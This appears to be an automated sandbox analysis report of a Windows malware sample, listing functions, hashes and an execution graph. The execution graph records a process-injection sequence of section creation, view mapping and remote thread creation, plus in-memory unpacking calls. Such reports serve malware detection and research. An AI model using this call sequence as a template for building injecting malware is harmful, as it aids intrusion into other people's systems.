                                                                                                                                                                                                                                  • Opcode ID: 732813def075f14b6808aff0da4bdb0eb0e43aff80adecb3507251e6a2845700
                                                                                                                                                                                                                                  • Instruction ID: ae7cf9be3d1fce48a15096ac77ba74933c532f06ec6d95f3fe2ddd9f4dfe1a97
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 732813def075f14b6808aff0da4bdb0eb0e43aff80adecb3507251e6a2845700
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52F0F8B2A08301CFD700DF1AD48568AFBE0AF99364F0489AEE48C87311D77495848F82
                                                                                                                                                                                                                                  Function 00430AEC Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 18444469ac8201bf6d50be6c6be0363dfdef2a52ebe0a6938612de2b41c52623
                                                                                                                                                                                                                                  • Instruction ID: d2283895444e6816146f9e0c787f061a4248d8bcf6bdef5045bd93e0b988b077
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18444469ac8201bf6d50be6c6be0363dfdef2a52ebe0a6938612de2b41c52623
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BF0A5B820170ADFCB04EF24C0C0946BBB6FB8A254B108694D9554B359D370EA85CBD1
                                                                                                                                                                                                                                  Function 004041A1 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: fdb49ddd0676105fb890e94d851dbd39c9667dbbe3c53e8b58a0a5c069b3c8d9
                                                                                                                                                                                                                                  • Instruction ID: 2e86e4d325f5bed903115bb993bc462fbf1965fbfa0060145ac79be2d419ae2c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fdb49ddd0676105fb890e94d851dbd39c9667dbbe3c53e8b58a0a5c069b3c8d9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CE01AB490020E8FCB04DFD8C9844AEBBF4FB84344F504924D911FB340D3B4AA49CB96
                                                                                                                                                                                                                                  Function 00413B28 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 176c9eddf9aafe92080969c7d109e491cf057128f0f04d4f0692368e2fc4a8e0
                                                                                                                                                                                                                                  • Instruction ID: a41860defdf9abbb504f597fe0df4669873d9d4c0d55f4595db763ac253d2f45
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 176c9eddf9aafe92080969c7d109e491cf057128f0f04d4f0692368e2fc4a8e0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50E0E5B480420E8FCB00DF98C4805EEBBF4FB44304F504814D951E7341E3B4AA858B95
                                                                                                                                                                                                                                  Function 00434374 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 80ea2f325673f58aee2f54ac8276a9b3497e992ad37f14f217f5d4d67151fde2
                                                                                                                                                                                                                                  • Instruction ID: 6ce1e727ee4d7dfeff4eb3af3dd772152ff0c5f12af5ff25561610fce65d30ca
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80ea2f325673f58aee2f54ac8276a9b3497e992ad37f14f217f5d4d67151fde2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DE01270E45208EBCF105F96C0093DCB7B8AB89315F40A45ACC5157381C2BCA589CF46
                                                                                                                                                                                                                                  Function 0040F941 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 68a7f19ab0fd0f3601d8c6fdb14c29474a3541f49a2bb213a7bc911d17348e72
                                                                                                                                                                                                                                  • Instruction ID: 306c0fd36619123d398432651b924f776724527c36ca17bc13dd0ba1def7b303
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68a7f19ab0fd0f3601d8c6fdb14c29474a3541f49a2bb213a7bc911d17348e72
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBE0FEB490830ADFCB40DF28C18059ABBE0BB48350F00882AFC98D3310D374D9558F52
                                                                                                                                                                                                                                  Function 0041091A Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 51089819093c43019874efc3920b1efacf9587d3f205b84763846640c86305f2
                                                                                                                                                                                                                                  • Instruction ID: b0cd7efb3881d9b3a963966fe3409d4ddc9c22448511cec5bd94ee76d7506236
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51089819093c43019874efc3920b1efacf9587d3f205b84763846640c86305f2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6E0FEB4A04209AFCB40DF58C18469EBBF0EB48314F10C859F858D7301D379EA509F12
                                                                                                                                                                                                                                  Function 0040EDA1 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 107651adfdec046f22a30b953c0c0e1492e875f6696c81ff378cbca3bab24482
                                                                                                                                                                                                                                  • Instruction ID: 28343df82bf1b62ee17bbcb750f3a4c7c606da3858416a10f89ab92bf0357718
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 107651adfdec046f22a30b953c0c0e1492e875f6696c81ff378cbca3bab24482
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DBD0C9382017049FC700EF68C085A087BE4AB0A344F418488E9859B361D274E8449B81
                                                                                                                                                                                                                                  Function 0040DE1E Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9394d148065dc2e909241a478bff279964b5a20ba34595c83bb40686dd9c25b2
                                                                                                                                                                                                                                  • Instruction ID: e6b9ab3bdf2ef03fcc2a6585ea530cbc44af2b48c63f685c3e0760148a44f72e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9394d148065dc2e909241a478bff279964b5a20ba34595c83bb40686dd9c25b2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3D0C9382007049FC700EF6CC086A087BE4AB0A344F418484E985DB361D674E9449B81
                                                                                                                                                                                                                                  Function 00409466 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 44f46f1ddbd888cb8fb3caf1a7592bb5d18d3fcb7db97d3fec7adb14089eba75
                                                                                                                                                                                                                                  • Instruction ID: a2cb7b6c807b7cc3dcc15eb02a2eaa115f6ecc571fac109568e2fb69d2d8435f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44f46f1ddbd888cb8fb3caf1a7592bb5d18d3fcb7db97d3fec7adb14089eba75
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3C00274904208DBCB00DF98C0985DCBBF4AB09304F518854EC64D7201C379A6408F11
                                                                                                                                                                                                                                  Function 004047AF Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7496c9abbb1e7d3455280672c6eb57923c25a17fc93ca8f1f255cd77e6728406
                                                                                                                                                                                                                                  • Instruction ID: 54f0d02c277385b77f7f952a4043ffd3eeb1d4ef131913eba4fe676f4e956275
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7496c9abbb1e7d3455280672c6eb57923c25a17fc93ca8f1f255cd77e6728406
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85A011B80082008ACB00AF28C0800283AA0BA80380B80082AA88083280C23C82808A03

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00431E07 Relevance: 14.1, Strings: 11, Instructions: 313COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000001.1796912620.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_401000_kFXFCWzZNovbPAcE4V3M4DAO.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: )$@$A$D$G$I$IHDR$N$P$T$Zy~
                                                                                                                                                                                                                                  • API String ID: 0-2779591581
                                                                                                                                                                                                                                  • Opcode ID: ae433dced1f9ffa8c785ebdf09278b13e76ca3695d5264077bf4735b7c8d9b5f
                                                                                                                                                                                                                                  • Instruction ID: 9820c1dc3e7d917ba19a2200bf3fb95368a3839bb42cbdbe1a677909d678d956
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae433dced1f9ffa8c785ebdf09278b13e76ca3695d5264077bf4735b7c8d9b5f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9F1B374908389CFDB00DFA8C584B8EBFF0AF59304F148559E498AB352D3799949CFA6

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:8.4%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:5.1%
                                                                                                                                                                                                                                  Total number of Nodes:118
                                                                                                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                                                                                                  execution_graph 3266 402e40 3269 402e37 3266->3269 3267 402edf 3269->3267 3270 4018e6 3269->3270 3271 4018f5 3270->3271 3272 40192e Sleep 3271->3272 3273 401949 3272->3273 3275 40195a 3273->3275 3276 401514 3273->3276 3275->3267 3277 401524 3276->3277 3278 4015c4 NtDuplicateObject 3277->3278 3280 4016e0 3277->3280 3279 4015e1 NtCreateSection 3278->3279 3278->3280 3281 401661 NtCreateSection 3279->3281 3282 401607 NtMapViewOfSection 3279->3282 3280->3275 3281->3280 3284 40168d 3281->3284 3282->3281 3283 40162a NtMapViewOfSection 3282->3283 3283->3281 3287 401648 3283->3287 3284->3280 3285 401697 NtMapViewOfSection 3284->3285 3285->3280 3286 4016be NtMapViewOfSection 3285->3286 3286->3280 3287->3281 3383 401542 3384 40153b 3383->3384 3385 4016e0 3384->3385 3386 4015c4 NtDuplicateObject 3384->3386 3386->3385 3387 4015e1 NtCreateSection 3386->3387 3388 401661 NtCreateSection 3387->3388 3389 401607 NtMapViewOfSection 3387->3389 3388->3385 3391 40168d 3388->3391 3389->3388 3390 40162a NtMapViewOfSection 3389->3390 3390->3388 3393 401648 3390->3393 3391->3385 3392 401697 NtMapViewOfSection 3391->3392 3392->3385 3394 4016be NtMapViewOfSection 3392->3394 3393->3388 3394->3385 3288 25f003c 3289 25f0049 3288->3289 3301 25f0e0f SetErrorMode SetErrorMode 3289->3301 3294 25f0265 3295 25f02ce VirtualProtect 3294->3295 3297 25f030b 3295->3297 3296 25f0439 VirtualFree 3299 25f04be LoadLibraryA 3296->3299 3297->3296 3300 25f08c7 3299->3300 3302 25f0223 3301->3302 3303 25f0d90 3302->3303 3304 25f0dad 3303->3304 3305 25f0dbb GetPEB 3304->3305 3306 25f0238 VirtualAlloc 3304->3306 3305->3306 3306->3294 3442 402dd0 3443 402ddc 3442->3443 3444 402edf 3443->3444 3445 4018e6 8 API calls 3443->3445 3445->3444 3364 4018f1 3365 4018f6 3364->3365 3366 40192e Sleep 3365->3366 3367 401949 3366->3367 3368 401514 7 API calls 3367->3368 3369 40195a 3367->3369 3368->3369 3429 401915 3430 4018c6 3429->3430 3431 40191a 3429->3431 3432 40192e Sleep 3431->3432 3433 401949 3432->3433 3434 401514 7 API calls 3433->3434 3435 40195a 3433->3435 3434->3435 3307 402f97 3308 4030ee 3307->3308 3309 402fc1 3307->3309 3309->3308 3310 40307c RtlCreateUserThread NtTerminateProcess 3309->3310 3310->3308 3326 25f0005 3331 25f092b GetPEB 3326->3331 3328 25f0030 3333 25f003c 3328->3333 3332 25f0972 3331->3332 3332->3328 3334 25f0049 3333->3334 3335 25f0e0f 2 API calls 3334->3335 3336 25f0223 3335->3336 3337 25f0d90 GetPEB 3336->3337 3338 25f0238 VirtualAlloc 3337->3338 3339 25f0265 3338->3339 3340 25f02ce VirtualProtect 3339->3340 3342 25f030b 3340->3342 3341 25f0439 VirtualFree 3344 25f04be LoadLibraryA 3341->3344 3342->3341 3345 25f08c7 3344->3345 3419 402d7b 3421 402d38 3419->3421 3420 4018e6 8 API calls 3422 402dc7 3420->3422 3421->3419 3421->3420 3421->3422 3311 284fd5a 3312 284fd69 3311->3312 3315 28504fa 3312->3315 3316 2850515 3315->3316 3317 285051e CreateToolhelp32Snapshot 3316->3317 3318 285053a Module32First 3316->3318 3317->3316 3317->3318 3319 284fd72 3318->3319 3320 2850549 3318->3320 3322 28501b9 3320->3322 3323 28501e4 3322->3323 3324 28501f5 VirtualAlloc 3323->3324 3325 285022d 3323->3325 3324->3325 3325->3325 3346 25f0001 3347 25f0005 3346->3347 3348 25f092b GetPEB 3347->3348 3349 25f0030 3348->3349 3350 25f003c 7 API calls 3349->3350 3351 25f0038 3350->3351 3370 4014fe 3371 401506 3370->3371 3372 401531 3370->3372 3373 4015c4 NtDuplicateObject 3372->3373 3378 4016e0 3372->3378 3374 4015e1 NtCreateSection 3373->3374 3373->3378 3375 401661 NtCreateSection 3374->3375 3376 401607 NtMapViewOfSection 3374->3376 3375->3378 3379 40168d 3375->3379 3376->3375 3377 40162a NtMapViewOfSection 3376->3377 3377->3375 3381 401648 3377->3381 3379->3378 3380 401697 NtMapViewOfSection 3379->3380 3380->3378 3382 4016be NtMapViewOfSection 3380->3382 3381->3375 3382->3378

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 106 4018a5-4018b7 100->106 104 401595-4015be 101->104 105 401896 101->105 104->105 114 4015c4-4015db NtDuplicateObject 104->114 105->106 112 4018c5 106->112 113 4018bc-4018e3 call 401193 106->113 112->113 114->105 116 4015e1-401605 NtCreateSection 114->116 119 401661-401687 NtCreateSection 116->119 120 401607-401628 NtMapViewOfSection 116->120 119->105 123 40168d-401691 119->123 120->119 121 40162a-401646 NtMapViewOfSection 120->121 121->119 126 401648-40165e 121->126 123->105 124 401697-4016b8 NtMapViewOfSection 123->124 124->105 127 4016be-4016da NtMapViewOfSection 124->127 126->119 127->105 129 4016e0 call 4016e5 127->129
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2598265535.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_5Hyf8PuolQS_j4ZkhvHWpkWr.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                  • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                                                                                                                                  • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69
                                                                                                                                                                                                                                  Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 153 4018a5-4018b7 147->153 151 401595-4015be 148->151 152 401896 148->152 151->152 161 4015c4-4015db NtDuplicateObject 151->161 152->153 159 4018c5 153->159 160 4018bc-4018e3 call 401193 153->160 159->160 161->152 163 4015e1-401605 NtCreateSection 161->163 166 401661-401687 NtCreateSection 163->166 167 401607-401628 NtMapViewOfSection 163->167 166->152 170 40168d-401691 166->170 167->166 168 40162a-401646 NtMapViewOfSection 167->168 168->166 173 401648-40165e 168->173 170->152 171 401697-4016b8 NtMapViewOfSection 170->171 171->152 174 4016be-4016da NtMapViewOfSection 171->174 173->166 174->152 176 4016e0 call 4016e5 174->176
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2598265535.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_5Hyf8PuolQS_j4ZkhvHWpkWr.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectView
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1652636561-0
                                                                                                                                                                                                                                  • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                                                                                                                                  • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24
                                                                                                                                                                                                                                  Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 197 4018a5-4018b7 191->197 195 401595-4015be 192->195 196 401896 192->196 195->196 205 4015c4-4015db NtDuplicateObject 195->205 196->197 203 4018c5 197->203 204 4018bc-4018e3 call 401193 197->204 203->204 205->196 207 4015e1-401605 NtCreateSection 205->207 210 401661-401687 NtCreateSection 207->210 211 401607-401628 NtMapViewOfSection 207->211 210->196 214 40168d-401691 210->214 211->210 212 40162a-401646 NtMapViewOfSection 211->212 212->210 217 401648-40165e 212->217 214->196 215 401697-4016b8 NtMapViewOfSection 214->215 215->196 218 4016be-4016da NtMapViewOfSection 215->218 217->210 218->196 220 4016e0 call 4016e5 218->220
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2598265535.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_5Hyf8PuolQS_j4ZkhvHWpkWr.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                  • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                                                                                                                                  • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24
                                                                                                                                                                                                                                  Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
